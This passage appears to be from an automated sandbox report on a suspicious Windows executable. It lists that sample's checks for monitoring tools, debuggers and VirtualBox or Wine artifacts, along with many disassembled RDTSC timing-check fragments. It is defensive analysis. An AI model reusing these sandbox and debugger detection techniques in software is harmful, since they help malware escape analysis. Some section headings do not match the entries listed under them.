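triage(open(path, "rb").read()) on a real file yields the same wording as the report; on the synthetic file it flags the unprintable name, euhadjik and .taggant as non-standard, euhadjik at entropy 8.00, the entry point in .taggant and the planted checksum. Because pe_checksum() skips the CheckSum field itself, building the file with bogus_checksum set to the computed value gives a file that verifies, which is the check "should be" in the report expresses. The "chars" field in sections() carries the section characteristics, so the EW/ER rights comparison from the unpack line can be reproduced by testing the EXEC and WRITE bits.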

Boot Survival

Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Window searched: window name: FilemonClass (twice)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Window searched: window name: PROCMON_WINDOW_CLASS (3 times)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Window searched: window name: Regmonclass
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 times)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (50 times)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: PROCMON.EXE
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: X64DBG.EXE
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WINDBG.EXE
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A106E6 second address: A10706 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFA692CA418h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFA692CA424h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A10706 second address: A1070A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A0F804 second address: A0F822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA692CA424h 0x00000009 pop ebx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A0F822 second address: A0F833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A0F96D second address: A0F980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jl 00007FFA692CA416h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A0F980 second address: A0F99F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C9h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A0FB21 second address: A0FB3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA426h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A12D12 second address: A12D17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A12DEE second address: A12E40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnp 00007FFA692CA428h 0x00000011 jmp 00007FFA692CA422h 0x00000016 mov eax, dword ptr [eax] 0x00000018 push esi 0x00000019 jmp 00007FFA692CA429h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 jo 00007FFA692CA422h 0x00000029 je 00007FFA692CA41Ch 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A12F0C second address: A12F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 add dword ptr [esp], 0CC3E086h 0x0000000d jng 00007FFA68B945BCh 0x00000013 or dword ptr [ebp+122D18F5h], esi 0x00000019 push 00000003h 0x0000001b mov dh, 09h 0x0000001d mov dword ptr [ebp+122D1BF9h], edx 0x00000023 push 00000000h 0x00000025 mov esi, 792D6DC4h 0x0000002a push 00000003h 0x0000002c mov cx, si 0x0000002f call 00007FFA68B945B9h 0x00000034 jmp 00007FFA68B945C7h 0x00000039 push eax 0x0000003a jmp 00007FFA68B945BAh 0x0000003f mov eax, dword ptr [esp+04h] 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jnp 00007FFA68B945B6h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A12F74 second address: A12F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A12F78 second address: A12F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A12F7E second address: A12F84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A12F84 second address: A12F88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A12F88 second address: A12FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push edi 0x0000000b jmp 00007FFA692CA428h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A12FB5 second address: A12FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A12FB9 second address: A1301C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FFA692CA41Ch 0x0000000c popad 0x0000000d pop eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FFA692CA418h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 call 00007FFA692CA426h 0x0000002d pop edx 0x0000002e lea ebx, dword ptr [ebp+1245ABBBh] 0x00000034 mov ecx, dword ptr [ebp+122D3A65h] 0x0000003a xchg eax, ebx 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e je 00007FFA692CA416h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A131D3 second address: A131DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A131DA second address: A131F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FFA692CA41Ah 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A131F5 second address: A1320C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A1320C second address: A13212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A13212 second address: A1322F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FFA68B945BFh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A1322F second address: A13249 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007FFA692CA416h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FFA692CA41Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A13249 second address: A1324D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A1324D second address: A13253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A13253 second address: A13257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A13257 second address: A132C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jnc 00007FFA692CA41Ah 0x0000000f jmp 00007FFA692CA427h 0x00000014 lea ebx, dword ptr [ebp+1245ABC6h] 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007FFA692CA418h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 or dword ptr [ebp+122D18DFh], edx 0x0000003a xchg eax, ebx 0x0000003b pushad 0x0000003c pushad 0x0000003d pushad 0x0000003e popad 0x0000003f jmp 00007FFA692CA41Ch 0x00000044 popad 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A317F8 second address: A31836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FFA68B945D0h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFA68B945C4h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A31C66 second address: A31C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jo 00007FFA692CA42Ch 0x0000000c jmp 00007FFA692CA424h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A31DE6 second address: A31DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A31DEC second address: A31DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A29ACD second address: A29AF0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFA68B945B8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push ecx 0x0000000e jmp 00007FFA68B945C1h 0x00000013 pop ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A29AF0 second address: A29B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA692CA428h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A331BF second address: A331C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A331C5 second address: A331DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Bh 0x00000007 jnc 00007FFA692CA416h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A334B2 second address: A334C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jnl 00007FFA68B945B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A334C0 second address: A334C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A337FC second address: A33800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A37F48 second address: A37F61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A37F61 second address: A37F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A37F65 second address: A37F73 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFA692CA416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A385EC second address: A385FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A385FC second address: A38645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA423h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FFA692CA41Dh 0x00000010 jmp 00007FFA692CA428h 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A38645 second address: A3865D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFA68B945BDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A3865D second address: A38661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A38661 second address: A38672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A38672 second address: A38676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A38676 second address: A3867C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A36E4C second address: A36E68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA428h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A36E68 second address: A36E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A38909 second address: A3890F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A3890F second address: A38914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A39944 second address: A39949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A39949 second address: A3995C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FFA68B945C8h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A3995C second address: A39962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A3E136 second address: A3E13A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A3E13A second address: A3E15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FFA692CA429h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A3E474 second address: A3E47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A3E8B2 second address: A3E8BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FFA692CA416h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A40AD0 second address: A40ADA instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFA68B945B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A40ADA second address: A40AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop esi 0x0000000a jc 00007FFA692CA436h 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A40AED second address: A40AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A40AF3 second address: A40B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007FFA692CA422h 0x0000000b jnl 00007FFA692CA416h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A411D9 second address: A411EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFA68B945BAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A412BF second address: A412EA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edi 0x0000000d jc 00007FFA692CA418h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop edi 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FFA692CA420h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A4184A second address: A4184E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A41A4A second address: A41A65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FFA692CA41Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A4206F second address: A42073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A42073 second address: A42077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A42077 second address: A42080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A42080 second address: A42086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A42086 second address: A420B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], ebx 0x00000009 sub esi, 75BEF0A2h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007FFA68B945CAh 0x00000018 jmp 00007FFA68B945C4h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A420B2 second address: A420C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A42185 second address: A4218F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FFA68B945B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A4218F second address: A42193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A42257 second address: A4225C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
